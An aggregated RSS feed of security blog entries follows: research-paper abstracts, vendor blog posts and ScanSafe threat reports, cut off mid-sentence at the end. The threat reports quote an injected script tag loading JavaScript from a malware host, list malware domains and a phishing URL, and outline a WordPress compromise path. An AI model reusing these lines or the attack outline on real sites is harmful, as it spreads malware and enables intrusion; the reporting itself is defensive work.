==> Attacking NTLM with Precomputed Hashtables

http://www.uninformed.org/uninformed.rss Breaking encrypted passwords has been of interest to hackers for a long time, and protecting them has always been one of the biggest security problems operating systems have faced, with ...

==> Linux Improvised Userland Schedular Virus

http://www.uninformed.org/uninformed.rss This paper discusses the combination of a userland scheduler and runtime process infection for a virus. These two concepts complete each other. The runtime process infection opens the door to ...

==> FUTo

http://www.uninformed.org/uninformed.rss Since the introduction of FU, the rootkit world has moved away from implementing system hooks to hide their presence. Because of this change in offense, a new defense had to be developed. The new algorithms ...

==> Thick Clients Gone Wrong

http://www.uninformed.org/uninformed.rss When designing thick-client based solutions,developers often suffer from the incorrect assumption that end-users are incapable of modifying, examining, or emulating the packaged client. Throughout this document, ...

==> Inside Blizzard: Battle.net

http://www.uninformed.org/uninformed.rss This paper intends to describe a variety of the problems Blizzard Entertainment has encountered from a practical standpoint through their implementation of the large-scale online game matchmaking and chat ...

==> Temporal Return Addresses

http://www.uninformed.org/uninformed.rss Nearly all existing exploitation vectors depend on some knowledge of a process' address space prior to an attack in order to gain meaningful control of execution flow. In cases where this is necessary, exploit ...

==> Bypassing Windows Hardware-enforced DEP

http://www.uninformed.org/uninformed.rss This paper describes a technique that can be used to bypass Windows hardware-enforced Data Execution Prevention (DEP) on default installations of Windows XP Service Pack 2 and Windows 2003 Server Service Pack 1. This technique makes it possible to execute ...

==> 802.11 VLANs and Association Redirection

http://www.uninformed.org/uninformed.rss The goal of this paper is to introduce the reader to a technique that could be used to implement something analogous to VLANs found in wired media into a typical IEEE 802.11 environment. ...

==> Introduction to Reverse Engineering Win32 Applications

http://www.uninformed.org/uninformed.rss During the course of this paper the reader will be (re)introduced to many concepts and tools essential to understanding and controlling native Win32 applications through the eyes of ...

==> Post-Exploitation on Windows using ActiveX Controls

http://www.uninformed.org/uninformed.rss When exploiting software vulnerabilities it is sometimes impossible to build direct communication channels between a target machine and an attacker's machine due to restrictive outbound ...

==> Smart Parking Meters

http://www.uninformed.org/uninformed.rss Security through obscurity is unfortunately much more common than people think: many interfaces are built on the premise that since they are a "closed system" they can ignore standard security practices. This paper ...

==> Loop Detection

http://www.uninformed.org/uninformed.rss During the course of this paper the reader will gain new knowledge about previous and new research on the subject of loop detection. The topic of loop detection will be applied to the field of binary analysis and ...

==> Social Zombies: Aspects of Trojan Networks

http://www.uninformed.org/uninformed.rss Malicious code is so common in today's Internet that it seems impossible for an average user to keep his or her system clean. It's estimated that several hundred thousand machines are infected by trojans to be abused in a variety of ways, including the theft ...

==> Mac OS X PPC Shellcode Tricks

http://www.uninformed.org/uninformed.rss Developing shellcode for Mac OS X is not particularly difficult, but there are a number of tips and techniques that can make the process easier and more effective. The independent data and instruction ...

==> Annoyances Caused by Unsafe Assumptions

http://www.uninformed.org/uninformed.rss This installation of What Were They Thinking illustrates some of the annoyances that can be caused when developing software that has to inter-operate with third-party applications. Two such cases ...

==> Verafied: Q&A With NSFOCUS

http://www.veracode.com/blog/?feed=rss2 Answered by Vann Abernethy Senior Product Manager at NSFOCUS 1. Tell us briefly about what NSFOCUS is all about. NSFOCUS is a global leader in active perimeter security. Our products and systems are crucial to some of the largest brand names and financial institutions and have been for more than a decade.

==> DARPA Joins Those Digging Deep Into Software Supply Chain

http://www.veracode.com/blog/?feed=rss2 The US Department of Defense is throwing money and resources at the problem of software supply chain security. Heres why supply chain securitys time has come.

==> Enterprise Testing of Applications is a Growing Trend

http://www.veracode.com/blog/?feed=rss2 One of the things we clearly see in our platform is that more vendor applications are being tested. Our SoSS reports are not based on surveys that collect opinions, it is an analysis of data aggregated from companies as they test and secure their applications. Our platform tracks whether an application is being tested as part of an enterprise effort to test vendor software. The number of vendor apps tested is rising every quarter.

==> A Movember Update: Why We Mo

http://www.veracode.com/blog/?feed=rss2 The Veracode Movember effort still needs your help! - Donate Here. Movember has been an entertaining, interesting and at times embarrassing month. From the looks we garnered around the office, in public, or from family, friends and loved ones, it is at times hard to justify the Moustache. This is all easily rectified once you inform the onlookers about the underlying cause, raising awareness for Prostate Cancer.

==> The Merchant of Malta: Who’s To Blame When Vulns Fetch A Price?

http://www.veracode.com/blog/?feed=rss2 The security firm ReVuln found itself on the receiving end of some harsh criticism this month after it demonstrated several previously unknown holes in common industrial control platforms, then said it would not share the details of those holes to vendors. As information about software vulnerabilities becomes more and more valuable, the question arises: who is to blame when software gets hacked: the researcher who exposes the weakness, or the developers who created it?

==> In Case You Haven’t Heard, These Cloud and Big Data Things are REALLY Cool

http://www.veracode.com/blog/?feed=rss2 Having spent the last 10 years or so working with technology on a day-to-day basis, I thought Id seen a good deal of Woah, that is cool moments. These moments range from just discovering modern day technology (the fact that companies made billions on database software blew my much younger mind for about a week) to more niche discoveries (my first identified SQL Injection vulnerability was a doozie, and I didnt even know it had a name until two years later!)

==> Identity Theft: Keeping Safe in an Online World Infographic

http://www.veracode.com/blog/?feed=rss2

==> Security Debt and Vulnerability Supply Chains

http://www.veracode.com/blog/?feed=rss2 When we were kicking around ideas for a new SoSS supplement, I thought the vendor testing angle could be interesting. We had just launched our VAST program so the topic made our marketing folks happy, but also because I think the supply chain analogy can be an interesting lens to view the security industry. We can think about the software supply chain as the vulnerability supply chain.

==> Software Security Needs Its Nate Silver

http://www.veracode.com/blog/?feed=rss2 Nate Silver, the rock star statistician behind the New York Times FiveThirtyEight blog, became an unwilling player in the heated political rhetoric ahead of the Nov 6. Presidential election. Silver covers politics and other news from the viewpoint of a statistician: putting the rhetoric and the political consultants alchemy aside to look at the numbers.

==> Spate of SpyEye Trojan Email

http://blog.scansafe.com/journal/rss.xml Beginning on May 5th, ScanSafe has observed numerous instances of a variant of the SpyEye family of trojans being delivered via email. The overwhelming majority of these are delivered via corp mail; very little have been observed via free webmail services. The rate of encounter suggests the mail may be getting through corp spam filtering at the affected locations. The body of the email contains a link that downloads a zip file containing the malware. The malware appears to be hosted on compromised websites in the following folder location: compromiseddomain\order\Order.zip The zip itself extracts into an executable. However, a double extension ruse combined with multiple spaces makes it appear as if the file is actually a .doc file. (The spaces push the .exe extension off the screen). Obviously this could trick many users into attempting to open the “doc” in which case they will actually infect their PC with the SpyEye trojan. ScanSafe detects and blocks this malware as: Mal/BredoZp-B Mal/EncPk-YJ Trojan.Win32.Menti.gjgn Trojan-Spy.Win32.SpyEyes.hdy First observed encounter was 05-may-11 at 11:38:05GMT.

==> Lizamoon SQL Injection: 7 Months Old and Counting

http://blog.scansafe.com/journal/rss.xml The Lizamoon SQL injection attack is not new; its actually part of a continuous SQLi attack that spans the past seven months. Lizamoon.com is just one of the more recent of the 40+ malware domains that have been used in the ongoing injection attacks. Here are some quick facts regarding the SQLi / Lizamoon compromises: * A total of 42 malware domains have been observed during the 7 months this attack has been ongoing; * The first encounter Cisco ScanSafe recorded was 20-sep-10 21:58:08 GMT; * Only 0.15% (zero point one five percent) have involved encounters with functional / active malware domains; * 99.85% of encounters have involved malware domains that were non-resolvable (shutdown / offline) at the time of encounter; * 55% of the encounters occurred on March 25th when the Lizamoon domain was added; * The high rate of encounters on the 25th was solely due to a single high profile website that was compromised; * Of the Lizamoon encounters on March 25th, only 0.13% were encounters with the live domain. 99.87% were non-resolvable (i.e. the domain was offline / not delivering content). Here's the current list of domains we've observed in these attacks, from September 2010 through March 31, 2011: agasi-story.info alexblane.com alisa-carter.com ave-stats.info books-loader.info eva-marine.info extra-911.info extra-service.info general-st.info google-stat50.info google-stats44.info google-stats45.info google-stats47.info google-stats48.info google-stats49.info google-stats50.info google-stats54.info google-stats55.info google-stats73.info lizamoon.com milapop.com mol-stats.info multi-stats.info online-guest.info online-stats201.info people-on.info pop-stats.info security-stats.info social-stats.info sol-stats.info star-stats.info stats-master11.info stats-master111.info stats-master88.info stats-master99.info system-stats.info t6ryt56.info tadygus.com tzv-stats.info urllizamoon--com.rtrk.co.uk world-stats598.info

==> Royal Engagement May Lead to Royal Malware Pains

http://blog.scansafe.com/journal/rss.xml The Telegraph reports "Royal memorabilia industry prepares to cash in" - The battle to cash in on Prince William’s impending marriage to Kate Middleton has already begun, with an array of royal memorabilia set to flood the market. My first thought on reading this was that malware and scammers will be even quicker to cash in. Indeed, many are proclaiming that Prince William's and Kate Middleton's wedding (set for sometime next spring) will be the biggest marital event since Princess Di and Prince Charles. With that in mind, it's important to remember three important thingst: 1. Major breaking news events are favorite themes for malware purveyors and scammers; 2. Clicking unsolicited links in email and IM are a frequent path of infection; 3. Criminals work fast - expect your favorite search engine to already be sprinkled liberally with malicious results regarding the engagement and upcoming nuptials. Cisco ScanSafe research indicates that 3 out of every 100 malware encounters results from people clicking unsolicited malicious links in email, IM and social messaging, and 10 out of evey 100 encounters occur via search engine results. Bottom line - think before you click, consider the source, and pay attention to the destination URL. By following this advice, hopefully you can toast to the happy couple without toasting your computer.

==> Phish with a Side of Barbecue

http://blog.scansafe.com/journal/rss.xml Looks like the latest Bank of America phishing scam is springboarding off a couple of compromised websites. First, here's a look at the predictably worded phishing email: Dear Bank of America Customer, We recently have determined that different computers have logged in your Bank of America Online Banking account, and multiple password failures were present before the logons. We now need you to re-confirm your account information to us. If this is not completed by July 31st, 2010, we will be forced to suspend your account indefinitely, as it may have been used for fraudulent purposes. We thank you for your cooperation in this manner. In order to confirm your Online Bank records, we may require some specific information from you. To restore your account, please Sign in to Online Banking. Here's where victims get sauced. The link behind "Sign in to Online Banking" actually points to gramsbbq.org/bain. Now grambbq.org is the legitimate website for Gram's Mission Barbecue Palace in Riverside, CA. The gramsbbq.org/bain page is a 302 redirect that leads to a phishing page hosted on a second compromised site: chasingarcadia.com (the website for Canadian band Chasing Arcadia). The actual phishing page is at: http://www.chasingarcadia.com/channel/safe.sslbankofamerica.com/index.htm This use of compromised sites as redirectors and phishing host enables the attackers to bypass reputation filters and/or community-based trust reporting. And it increases the collateral damage, because if/when the compromised sites are blacklisted, those businesses could suffer as a result.

==> WSJ a Victim, Not the Source, of SQL Injection

http://blog.scansafe.com/journal/rss.xml As mentioned earlier this week, about 7k pages (not sites) have been struck by SQL injected iframes pointing to malware on robint.us. (That number has been over-inflated by over 100k or even a million due to poorly constructed search queries, which was the subject of the previous post on the topic). Anyway, in some of the reports, one of the sites claimed to be compromised was that of the Wall Street Journal (WSJ.com). However, ScanSafe investigation reveals the SQL injection attack that appeared on certain pages of the WSJ site weren't the result of compromise on WSJ directly, but rather the result of compromise of a third-party partner. That partner, adicio.com, provides real estate listings that are in turn displayed on certain pages of the WSJ.com website. Of course, from a site visitor's perspective, this might seem a bit semantic. But still, it is worth pointing out that it wasn't really wsj.com that was compromised.

==> Robint.us a Poster bleep for Repeat Injections

http://blog.scansafe.com/journal/rss.xml One of many SQL injection attacks is getting some blogger attention, largely due to generic searches on the malware domain name. The malicious iframe on the compromised site is: script src=http://ww.robint.us/u.js Search on the full iframe with quotes and you get about 7k hits in Google. But search on just the domain name or omit the quotes and you get over a million hits. That's because the more generic search picks up any page that mentions the domain or includes any mix of those keywords. This loosely constructed search mistake causes some to believe the attack is much larger than it really is. Certainly 7k Web pages compromised is nothing to sneeze at but it's certainly not a million pages and certainly nothing new - many of these same compromised pages have been repeatedly compromised in one SQL injection attack after another since 2007. On a more positive note, when SQL injection attacks first went mainstream a few years back, it wasn't uncommon to see a million+ pages compromised in a single attack. From that perspective, 7k is a vast improvement and shows that at least many sites are paying attention and taking the appropriate security measures. On the downside, attacks like robint.us are just one of over a thousand unique attacks carried out via the Web each month.

==> GoDaddy Attacks Top Web Malware in May

http://blog.scansafe.com/journal/rss.xml Some interesting stats from May. * 16196 unique malicious domains. * The top ten malicious domains comprised 23% of all Web malware attacks in May 2010. * Five of the top ten were related to attacks against GoDaddy-hosted websites, for a total of 14% of all Web malware in May 2010. * Top Web malware was Trojan.JS.Redirector.cq, the majority of which resulted from attacks against GoDaddy-hosted websites. * Gumblar was the second most prevalent Web malware encountered, at 7%. * Third most prevalent Web-distributed malware encountered was Backdoor.Win32.Alureon, at 6%. Top Ten Malicious Domains, May 2010 holasionweb.com* - 7% www.sitepalace.com - 3% losotrana.com* - 2% indesignstudioinfo.com* - 2% kdjkfjskdfjlskdjf.com* - 2% easfindnex.org - 2% findermar.org - 2% 76.73.33.109 - 2% findrasup.org - 1% zettapetta.com* - 1% *Related to attacks against GoDaddy-hosted websites Top Ten Web Malware, May 2010 Trojan.JS.Redirector.cq - 14% Exploit.JS.Gumblar - 7% Backdoor.Win32.Alureon - 6% Exploit.Java.CVE-2009-3867.d - 3% Trojan.JS.Redirector.at - 3% Downloader.JS.Agent.fhx - 2% OI.Backdoor.Win32.Autorun.cx - 2% OI.Win32.Susp.ms - 2% Trojan.Iframe.f - 2% Trojan.GIFIframe.a - 2%

==> WordPress Hacks: Not Just NetSol and GoDaddy

http://blog.scansafe.com/journal/rss.xml Over the past month or so, there have been a series of ongoing compromises which have been interchangeably blamed on WordPress, Network Solutions, or GoDaddy. However, the attacks are occurring on many other hosts as well, including: 1 & 1 DreamHost In2Net Hostway Media Temple ServerBeach and several others. While many of the compromised sites are using WordPress, some are not. The two main attacks are: (1) the Google / WordPress pharma attacks and (2) the Grepad.com family of attacks that netted Network Solutions hosted sites, some U.S. Treasury sites, and many, many popular niche 'mom and pop' style sites. Google / WordPress Pharma Hacks In the Google / WordPress pharma attack, the attackers are targeting popular Web pages and modifying the title tag of those pages to include a pharmaceutical sales pitch. Searches that would normally cause the legitimate site to appear in search engine results pages (SERPs) will also include the manipulated title tag. The link itself still points to the legitimate site, but modifications on the compromised site will cause an automatic redirect to the pharmaceutical site. Note that many of the sites that appear in Google SERPs for these title tags are not necessarily compromised. Quite often, blog and forum comments will adopt the title tag of the post and spammers are using these same tags. For those that are compromised, currently the redirect points to "thepharmacydiscount.com/group/bestsellers.html?said=compromised.com" where compromised.com equals the name of the legitimate (but compromised site) that is delivering the redirect. The point behind the Google / WordPress pharma attacks is to leverage the popularity ranking of the compromised sites, which boosts the SERPs ranking for the pharma keywords used. Grepad.com Attacks The intent of the Grepad.com family of attacks is not to gain favorable placement in SERPs to peddle counterfeit bleep, but rather to download malware to the site visitors' PCs. Pages on the compromised websites are embedded with hidden iframes that load content from the malware domain. Multiple malware domains have been used in these attacks, including grepad.com, ginopost.com, bigcorpads.com, binglbalts.com, corpadsinc.com, hugeadsorg.com, mainnetsoll.com and networkads.net. Exploits of multiple vulnerabilities are attemped in order to download this malware. A list of observed exploits can be found in this blog post. Commonalities Between Attacks In both sets of attacks, the attackers are filtering based on whether the clickthrough to the site is human or a search spider. In the pharma attacks, the malformed title is only presented to search spiders and the redirect only occurs if you click the link from SERPs. If you visit the site directly, by typing in the URL or from a non-SERPs link on another site, the legitimate page will load normally. The exact opposite is true with the Grepad.com family of attacks. In these cases, the filters suppress the compromise so that search spiders don't see the embedded iframe. If the link is accessed directly (or via a link from a non-search engine), then the iframe will be rendered. However, the attackers also drop a cookie when visitors hit a compromised page and suppress the iframe on subsequent visits. Filtering is also being done by IP address ranges, operating system, and user_agent to determine when the embedded iframe (or pharma redirect) will occur. The Million Dollar Question: How? The why is easy to answer: attackers want to make money. The how is a bit more cloudy. It appears the attacker is able to read wp-config.php which by necessity contains plaintext credentials for the WordPress database. Normally, wp-config.php should not be externally readable, unless the user has not properly configured file permissions. In any event, once initial access was gained, the attackers inserted or modified entries in the wp-option table for the active WordPress database. In subsequent phases (in the case of the Grepad family), the attackers modified php.ini / .htaccess, uploading malicious scripts which then embed the iframe. At this point, the attackers have the ability to plant PHP backdoors on the compromised sites, a precedent first set by Gumblar. The presence of the backdoor would allow continued access to the compromised sites, even after file permissions were properly configured or FTP credentials had been changed. And if proper segregation is not done, bleed over to other sites on the same hosted share can still occur. It's worth noting that the U.S. Bureau of Engraving and Printing (bep.gov and moneyfactory.gov) were compromised in the most recent wave of the Grepad.com attacks. While neither of these sites appear to have been using WordPress, both were hosted by Network Solutions and appear to have been published with Network Solutions Website Builder.

==> Grepad.com Iframe Nets Gov't, Niche Sites

http://blog.scansafe.com/journal/rss.xml ScanSafe traffic analysis reveals a number of government and popular niche websites have been embedded with a malicious script inserted after the closing html tag. The script first drops a cookie to identify repeat visitors, then loads an iframe pointing to grepad.com. In turn, grepad.com redirects to ginopost.com which attempts to exploit a series of vulnerabilities. Observed exploits include: * Adobe Reader and Acrobat util.printf stack-based buffer overflow (CVE-2008-2992) * Adobe Reader and Acrobat getIcon stack-based buffer overflow (CVE-2009-0927) * Office OCX OpenWebFile (BID-33243) * Symantec AppStream LaunchObj ActiveX control (CVE-2008-4388) * Hummingbird PerformUpdateAsync (CVE-2008-4728) * Peachtree ExecutePreferredApplication (CVE-2008-4699) * C6 Messenger propDownloadUrl (CVE-2008-2551) * Internet Explorer memory corruption (MS09-002) The malware host, ginopost.com, was registered on April 25th, using the same IP address (188.124.16.104) as a series of malware hosts that have been engaged in attacks on Network Solutions hosted WordPress blogs. Previous malware domains using that IP have included bigcorpads.com, binglbalts.com, corpadsinc.com, hugeadsorg.com, mainnetsoll.com and networkads.net. Attacks on WordPress-published websites have not been restricted to those hosted by Network Solutions. A separate ongoing series of attacks have also been targeted against WordPress-published sites hosted by GoDaddy.

==> Anti-Virus, now with added Michelangelo

http://blogs.securiteam.com/index.php/feed/ Apparently it’s all our fault. Again. Not only is anti-virus useless, but we’re responsible for the evolution and dramatic increased volume of malware. According to something I read today “If it wasnt for the security industry the malware that was written back in the 90s might still be working today.” I guess that’s not as [...]

==> Why can’t my laptop figure out what time zone I’m in, like my cell phone does?

http://blogs.securiteam.com/index.php/feed/ We got new cell phones (mobiles, for you non-North Americans) recently. In the time since we last bought phones they have added lots of new features, like texting, cameras, email and Google Maps. This, plus the fact that I am away on a trip right now, and Gloria has to calculate what time it is [...]

==> Blatant much?

http://blogs.securiteam.com/index.php/feed/ So a friend of mine posts (on Twitter) a great shot of a clueless phishing spammer: So I reply: @crankypotato Were only all such phishing spammers so clueless. (Were only all users clueful enough to notice …) So some other scammer tries it out on me: Max Dubberly @Maxt4dxsviida @rslade http://t.co/(dangerous URL that I’m not [...]

==> I *thought* “Gangnam style” looked familiar …

http://blogs.securiteam.com/index.php/feed/ REmember “Monty Python and the Holy Grail“?

==> Still think “climate change” is just an academic curiosity?

http://blogs.securiteam.com/index.php/feed/ “A study conducted by scientists at the Royal Botanic Gardens, Kew (UK), in collaboration with scientists in Ethiopia, reports that climate change alone could lead to the extinction of wild Arabica coffee (Coffea arabica) well before the end of this century.” Not so smug now, are you? (I trust I do not have to explain [...]

==> REVIEW: “The Quantum Thief”, Hannu Rajaniemi

http://blogs.securiteam.com/index.php/feed/ BKQNTTHF.RVW 20120724 “The Quantum Thief”, Hannu Rajaniemi, 2010, 978-1-4104-3970-3 %A Hannu Rajaniemi %C 175 Fifth Avenue, New York, NY 10010 %D 2010 %G 978-1-4104-3970-3 0765367661 %I Tor Books/Tom Doherty Assoc. %O pnh@tor.com www.tor.com %O http://www.amazon.com/exec/obidos/ASIN/0765367661/robsladesinterne http://www.amazon.co.uk/exec/obidos/ASIN/0765367661/robsladesinte-21 %O http://www.amazon.ca/exec/obidos/ASIN/0765367661/robsladesin03-20 %O Audience n Tech 1 Writing 2 (see revfaq.htm for explanation) %P 466 p. %T “The Quantum [...]

==> Apple Now “Owns” the Page Turn

http://blogs.securiteam.com/index.php/feed/ A blog posting at the New York Times: “Yes, that’s right. Apple now owns the page turn. You know, as when you turn a page with your hand. An “interface” that has been around for hundreds of years in physical form. I swear I’ve seen similar animation in Disney or Warner Brothers cartoons. (This is [...]

==> Border (relative) difficulties

http://blogs.securiteam.com/index.php/feed/ I have experienced all kinds of difficulties travelling down to the US to teach. It used to be a lot easier, in the old days. Border agent: “Business or pleasure?” Me: “Business.” BA: “What are you doing?” Me: “Teaching.” BA: “OK.” Then The-Conservative-Government-Before-The-New-Harperite-Government-Of-Canada decided, in it’s infinite wisdom, to bring in something called the North [...]

==> User interface

http://blogs.securiteam.com/index.php/feed/ The food fair area of one of the local mall had a facelift recently. Now, as you walk down the hall towards the washrooms, the first thing you see is a lighted sign stating “WOMEN” on the first hallway that tak